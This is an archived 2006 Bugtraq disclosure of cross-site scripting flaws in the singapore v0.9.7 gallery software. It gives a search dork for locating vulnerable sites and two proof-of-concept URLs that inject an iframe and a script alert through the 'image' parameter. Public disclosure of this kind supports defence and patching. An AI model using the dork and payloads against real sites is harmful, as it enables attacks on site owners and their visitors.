[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

singapore v0.9.7 XSS Vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: singapore v0.9.7 XSS Vulnerabilities
From: alp_eren@xxxxxxxxxxxx
Date: 8 May 2006 07:25:47 -0000

SOFTWARE: 
========= 
singapore v0.9.7

DESCRIPTION: 
============ 
The system is vulnerable to various XSS attacks

google dork :  "Powered by singapore v0.9.7" inurl:index.php?gallery
429 results :)

xss code example
================
www.site.com/images/index.php?gallery=[gallery 
name]&image=<iframe%20src="http://www.yoursite.com";>

www.site.com/images/index.php?gallery=[gallery 
name]&image=<script>alert("lol")<script>   

mail: alp_eren[at]ayyildiz[dot]com
web : http://www.ayyildiz.org

greets to thehacker,iskorpitx,suskun,shadow, and all AYT member

Prev by Date: Claroline Open Source e-Learning 1.7.5 Remote File Include
Next by Date: INFIGO-2006-05-03: Multiple FTP Servers vulnerabilities
Previous by thread: Claroline Open Source e-Learning 1.7.5 Remote File Include
Next by thread: INFIGO-2006-05-03: Multiple FTP Servers vulnerabilities
Index(es):
- Date
- Thread